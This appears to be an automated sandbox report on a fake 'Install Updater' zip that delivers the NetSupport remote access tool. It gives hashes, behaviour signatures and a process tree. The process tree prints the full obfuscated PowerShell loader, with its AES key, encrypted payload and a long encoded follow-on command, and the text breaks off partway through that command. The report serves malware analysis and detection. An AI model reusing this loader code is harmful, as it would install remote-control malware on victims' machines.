Analysis

  • max time kernel
    141s
  • max time network
    206s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18/07/2023, 03:25

General

  • Target

    Install Updater (V104.551.2)-stable.zip

  • Size

    4.7MB

  • MD5

    fbe7dec7fbb2ab938fb68c68311a4168

  • SHA1

    08326c945c66fc4ed00e818913258905efbe8495

  • SHA256

    ab08ba5cb3eb0ef2cffeecefe99023bf0f080f19cfe0187892f5b08f41345e39

  • SHA512

    ffa6445d59b07ab31c33aaef1befb1a409140f17d7e1931f8247f409a27b5960f34f48a203fc262acd487c4aef9f969f8d5cf0a3dbabf36b8faca362cf78f5f1

  • SSDEEP

    98304:86OGtHcG/ILJjjSQ8ByUBIPoVs+90eNDzumoYQBcnG3:86O4HcuI1jHJwVVCeN/umvQcnE

Score
10/10

Malware Config

Signatures

  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 5 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 54 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Windows\Explorer.exe
    C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Install Updater (V104.551.2)-stable.zip"
    1⤵
      PID:1112
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:1392
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Install Updater (V104.551.2)-stable.zip\Install Updater (V104.551.2)-stable.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        1⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:1472
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $uGSyEn = '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';$QcRGrPc = 'ZWdYRXFVeWZGcVZNVlJXYWxURnRZc2ZZeFFoUk9XSWQ=';$WpXrWka = New-Object 'System.Security.Cryptography.AesManaged';$WpXrWka.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WpXrWka.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WpXrWka.BlockSize = 128;$WpXrWka.KeySize = 256;$WpXrWka.Key = [System.Convert]::FromBase64String($QcRGrPc);$SSGYL = [System.Convert]::FromBase64String($uGSyEn);$yAgygcvl = $SSGYL[0..15];$WpXrWka.IV = $yAgygcvl;$ixbKtdOeJ = $WpXrWka.CreateDecryptor();$AbQURXmxw = $ixbKtdOeJ.TransformFinalBlock($SSGYL, 16, $SSGYL.Length - 16);$WpXrWka.Dispose();$tZUSbrft = New-Object System.IO.MemoryStream( , $AbQURXmxw );$UfhVzIKO = New-Object System.IO.MemoryStream;$KFAgbvVxM = New-Object System.IO.Compression.GzipStream $tZUSbrft, ([IO.Compression.CompressionMode]::Decompress);$KFAgbvVxM.CopyTo( $UfhVzIKO );$KFAgbvVxM.Close();$tZUSbrft.Close();[byte[]] $qvUGhdu = $UfhVzIKO.ToArray();$AjSplBV = [System.Text.Encoding]::UTF8.GetString($qvUGhdu);$AjSplBV | powershell - }
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1368
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c powershell.exe $uGSyEn = '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';$QcRGrPc = 'ZWdYRXFVeWZGcVZNVlJXYWxURnRZc2ZZeFFoUk9XSWQ=';$WpXrWka = New-Object 'System.Security.Cryptography.AesManaged';$WpXrWka.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WpXrWka.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WpXrWka.BlockSize = 128;$WpXrWka.KeySize = 256;$WpXrWka.Key = [System.Convert]::FromBase64String($QcRGrPc);$SSGYL = [System.Convert]::FromBase64String($uGSyEn);$yAgygcvl = $SSGYL[0..15];$WpXrWka.IV = $yAgygcvl;$ixbKtdOeJ = $WpXrWka.CreateDecryptor();$AbQURXmxw = $ixbKtdOeJ.TransformFinalBlock($SSGYL, 16, $SSGYL.Length - 16);$WpXrWka.Dispose();$tZUSbrft = New-Object System.IO.MemoryStream( , $AbQURXmxw );$UfhVzIKO = New-Object System.IO.MemoryStream;$KFAgbvVxM = New-Object System.IO.Compression.GzipStream $tZUSbrft, ([IO.Compression.CompressionMode]::Decompress);$KFAgbvVxM.CopyTo( $UfhVzIKO );$KFAgbvVxM.Close();$tZUSbrft.Close();[byte[]] $qvUGhdu = $UfhVzIKO.ToArray();$AjSplBV = [System.Text.Encoding]::UTF8.GetString($qvUGhdu);$AjSplBV | powershell -
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3564
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -
              4⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2944
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ExecutionPolicy UnRestricted -Encoded DQAKAEEAZABkAC0AVAB5AHAAZQAgAC0ATgBhAG0AZQAgAEMAbwBuAHMAbwBsAGUAVQB0AGkAbABzACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAFcAUABJAEEAIAAtAE0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACcADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0ADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAUABvAHMAdABNAGUAcwBzAGEAZwBlACgAaQBuAHQAIABoAFcAbgBkACwAIAB1AGkAbgB0ACAATQBzAGcALAAgAGkAbgB0ACAAdwBQAGEAcgBhAG0ALAAgAGkAbgB0ACAAbABQAGEAcgBhAG0AKQA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbwBuAHMAdAAgAGkAbgB0ACAAVwBNAF8AQwBIAEEAUgAgAD0AIAAwAHgAMAAxADAAMAA7AA0ACgAnAEAADQAKAEYAdQBuAGMAdABpAG8AbgAgAHMAYwByAGkAcAB0ADoAUwBlAHQALQBJAE4ARgBGAGkAbABlACAAewBbAEMAbQBkAGwAZQB0AEIAaQBuAGQAaQBuAGcAKAApAF0AUABhAHIAYQBtACAAKAAkAEkAbgBmAEYAaQBsAGUATABvAGMAYQB0AGkAbwBuACAAPQAgACIAJABlAG4AdgA6AHQAZQBtAHAAXABDAE0AUwBUAFAALgBpAG4AZgAiACwAWwBTAHQAcgBpAG4AZwBdACQAQwBvAG0AbQBhAG4AZABUAG8ARQB4AGUAYwB1AHQAZQAgAD0AIAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAB1AG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAtAEUAbgBjAG8AZABlAGQAIAAiACAAVQBnAEIARgBBAEUAYwBBAEkAQQBCAEIAQQBHAFEAQQBaAEEAQQBnAEEAQwBJAEEAUwBBAEIATABBAEUAVQBBAFcAUQBCAGYAQQBFAE0AQQBUAEEAQgBCAEEARgBNAEEAVQB3AEIARgBBAEYATQBBAFgAdwBCAFMAQQBFADgAQQBUAHcAQgBVAEEARgB3AEEAUQB3AEIATQBBAEYATQBBAFMAUQBCAEUAQQBGAHcAQQBlAHcAQQAyAEEARABRAEEATgBRAEIARwBBAEUAWQBBAE0AQQBBADAAQQBEAEEAQQBMAFEAQQAxAEEARABBAEEATwBBAEEAeABBAEMAMABBAE0AUQBBAHcAQQBEAEUAQQBRAGcAQQB0AEEARABrAEEAUgBnAEEAdwBBAEQAZwBBAEwAUQBBAHcAQQBEAEEAQQBRAFEAQgBCAEEARABBAEEATQBBAEEAeQBBAEUAWQBBAE8AUQBBADEAQQBEAFEAQQBSAFEAQgA5AEEARgB3AEEAYwB3AEIAbwBBAEcAVQBBAGIAQQBCAHMAQQBGAHcAQQBiAHcAQgB3AEEARwBVAEEAYgBnAEIAYwBBAEcATQBBAGIAdwBCAHQAQQBHADAAQQBZAFEAQgB1AEEARwBRAEEASQBnAEEAZwBBAEMAOABBAFoAZwBBAGcAQQBDADgAQQBkAGcAQgBsAEEAQwBBAEEATAB3AEIAMABBAEMAQQBBAFUAZwBCAEYAQQBFAGMAQQBYAHcAQgBUAEEARgBvAEEASQBBAEEAdgBBAEcAUQBBAEkAQQBCAEQAQQBEAG8AQQBYAEEAQgBWAEEASABNAEEAWgBRAEIAeQBBAEgATQBBAFgAQQBCAEIAQQBHAFEAQQBiAFEAQgBwAEEARwA0AEEAWABBAEIAQgBBAEgAQQBBAGMAQQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAVQBnAEIAdgBBAEcARQBBAGIAUQBCAHAAQQBHADQAQQBaAHcAQgBjAEEARQBrAEEAYgB3AEIAdQBBAEcAawBBAFkAdwBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARwBJAEEAWQBRAEIAdQBBAEcAUQBBAFgAQQBCAGoAQQBHAHcAQQBhAFEAQgBsAEEARwA0AEEAZABBAEEAegBBAEQASQBBAEwAZwBCAGwAQQBIAGcAQQBaAFEAQQA3AEEAQwBRAEEAUQBRAEIAagBBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBJAEEAQQA5AEEAQwBBAEEASwBBAEIATwBBAEcAVQBBAGQAdwBBAHQAQQBGAE0AQQBZAHcAQgBvAEEARwBVAEEAWgBBAEIAMQBBAEcAdwBBAFoAUQBCAGsAQQBGAFEAQQBZAFEAQgB6AEEARwBzAEEAUQBRAEIAagBBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBJAEEAQQB0AEEARQBVAEEAZQBBAEIAbABBAEcATQBBAGQAUQBCADAAQQBHAFUAQQBJAEEAQgBEAEEARABvAEEAWABBAEIAVgBBAEgATQBBAFoAUQBCAHkAQQBIAE0AQQBYAEEAQgBCAEEARwBRAEEAYgBRAEIAcABBAEcANABBAFgAQQBCAEIAQQBIAEEAQQBjAEEAQgBFAEEARwBFAEEAZABBAEIAaABBAEYAdwBBAFUAZwBCAHYAQQBHAEUAQQBiAFEAQgBwAEEARwA0AEEAWgB3AEIAYwBBAEUAawBBAGIAdwBCAHUAQQBHAGsAQQBZAHcAQgBDAEEARwBFAEEAYwB3AEIAbABBAEcASQBBAFkAUQBCAHUAQQBHAFEAQQBYAEEAQgBqAEEARwB3AEEAYQBRAEIAbABBAEcANABBAGQAQQBBAHoAQQBEAEkAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAcABBAEQAcwBBAEoAQQBCAFUAQQBIAEkAQQBhAFEAQgBuAEEARwBjAEEAWgBRAEIAeQBBAEMAQQBBAFAAUQBBAGcAQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAVQB3AEIAagBBAEcAZwBBAFoAUQBCAGsAQQBIAFUAQQBiAEEAQgBsAEEARwBRAEEAVgBBAEIAaABBAEgATQBBAGEAdwBCAFUAQQBIAEkAQQBhAFEAQgBuAEEARwBjAEEAWgBRAEIAeQBBAEMAQQBBAEwAUQBCAEIAQQBIAFEAQQBUAEEAQgB2AEEARwBjAEEAVAB3AEIAdQBBAEQAcwBBAFUAZwBCAGwAQQBHAGMAQQBhAFEAQgB6AEEASABRAEEAWgBRAEIAeQBBAEMAMABBAFUAdwBCAGoAQQBHAGcAQQBaAFEAQgBrAEEASABVAEEAYgBBAEIAbABBAEcAUQBBAFYAQQBCAGgAQQBIAE0AQQBhAHcAQQBnAEEAQwAwAEEAVgBBAEIAaABBAEgATQBBAGEAdwBCAE8AQQBHAEUAQQBiA